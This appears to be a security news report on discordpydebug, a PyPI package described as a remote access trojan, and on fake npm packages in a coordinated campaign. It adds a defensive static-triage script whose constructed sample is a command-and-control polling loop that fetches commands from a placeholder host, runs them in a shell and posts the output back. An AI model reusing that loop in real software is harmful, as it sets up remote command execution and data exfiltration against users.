
Researchers have uncovered a malicious package in the PyPI repository, masquerading as a utility for working with Discord but in reality embedding a fully functional remote access trojan. The package in question, named discordpydebug, was uploaded on March 21, 2022. Since its publication, it has been downloaded over 11,500 times and remains available for installation, despite having received no updates.
At first glance, the package appears to be a simple tool intended for developers working with the Discord.py library. However, analysts from the Socket team discovered that it conceals malicious code capable of establishing a connection with an external command-and-control server and executing instructions received from its operator.
The trojan supports file read and write operations, as well as shell command execution, granting the attacker the ability to exfiltrate sensitive data—including tokens and credentials—modify files, deploy additional malicious payloads, and transmit information back to the attacker.
What distinguishes this malware is that it communicates with its command server through ordinary outbound HTTP requests, polling for instructions rather than listening for inbound connections. Because outbound web traffic from developer machines is rarely blocked or inspected, this lets it slip past many firewalls and monitoring systems—particularly in development environments where security controls may be relaxed. While the code lacks mechanisms for persistence or privilege escalation, it remains a simple yet potent threat.
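The behaviour triad described above (outbound HTTP to a command server, shell execution, file read/write) is something a defender can triage for statically. The following is an added example, not code from the Socket report or from discordpydebug itself; the callee-to-class map is an assumed heuristic and both sample modules are constructed for illustration.

```python
"""Added example, not code from the Socket report or from discordpydebug itself:
static triage of Python source for the behaviour triad the article attributes to
the trojan (outbound HTTP calls, shell execution, file I/O). The callee map and
the sample modules below are constructed heuristics for illustration."""
import ast

# Callee name -> behaviour class. Assumed heuristics, not signatures from the report.
CALL_CLASS = {
    "requests.get": "http", "requests.post": "http", "urllib.request.urlopen": "http",
    "subprocess.run": "shell", "subprocess.Popen": "shell",
    "subprocess.check_output": "shell", "os.system": "shell", "os.popen": "shell",
    "open": "file",
}

def _callee(node):
    """Dotted name of a Call's target, e.g. 'requests.post'; '' if not resolvable."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def triage_source(src):
    """Return the set of behaviour classes ('http', 'shell', 'file') found in src."""
    callees = (_callee(n.func) for n in ast.walk(ast.parse(src)) if isinstance(n, ast.Call))
    return {CALL_CLASS[name] for name in callees if name in CALL_CLASS}

def is_rat_like(src):
    """True when all three classes co-occur in one module: the pattern to escalate."""
    return {"http", "shell", "file"} <= triage_source(src)

# Constructed sample shaped like the polling loop the article describes; it is only
# parsed here, never executed, and the host is a reserved .invalid placeholder.
SAMPLE_SUSPICIOUS = '''
import requests, subprocess
while True:
    task = requests.get("http://c2.example.invalid/task").text
    out = subprocess.check_output(task.split())
    open("/tmp/result.bin", "wb").write(out)
    requests.post("http://c2.example.invalid/result", data=out)
'''
# Constructed benign sample: HTTP only, as a legitimate Discord helper might do.
SAMPLE_BENIGN = 'import requests\nprint(requests.get("https://discord.com/api").status_code)\n'

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, sorted(triage_source(src)), is_rat_like(src))
```

Run it over the contents of a freshly installed distribution under site-packages to get a quick first-pass list of modules worth a manual look; co-occurrence is a triage signal, not proof of malice.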
In parallel with this discovery, Socket researchers also identified a cluster of counterfeit libraries within the npm repository, impersonating popular packages from other ecosystems. Among the impersonated libraries were clones of beautifulsoup4, apache-httpclient, opentk, and seaborn. All of the fake packages leverage a shared infrastructure, include similarly structured obfuscated malicious scripts, and point to a single IP address—strongly indicating a coordinated campaign likely orchestrated by a single threat actor.
The malicious npm packages incorporate evasion techniques, initiate harmful scripts, steal data, and are capable of maintaining a prolonged presence within infected systems. These incidents underscore the fragility of software supply chains and highlight the critical importance of rigorously vetting third-party code sources—especially within open-source environments.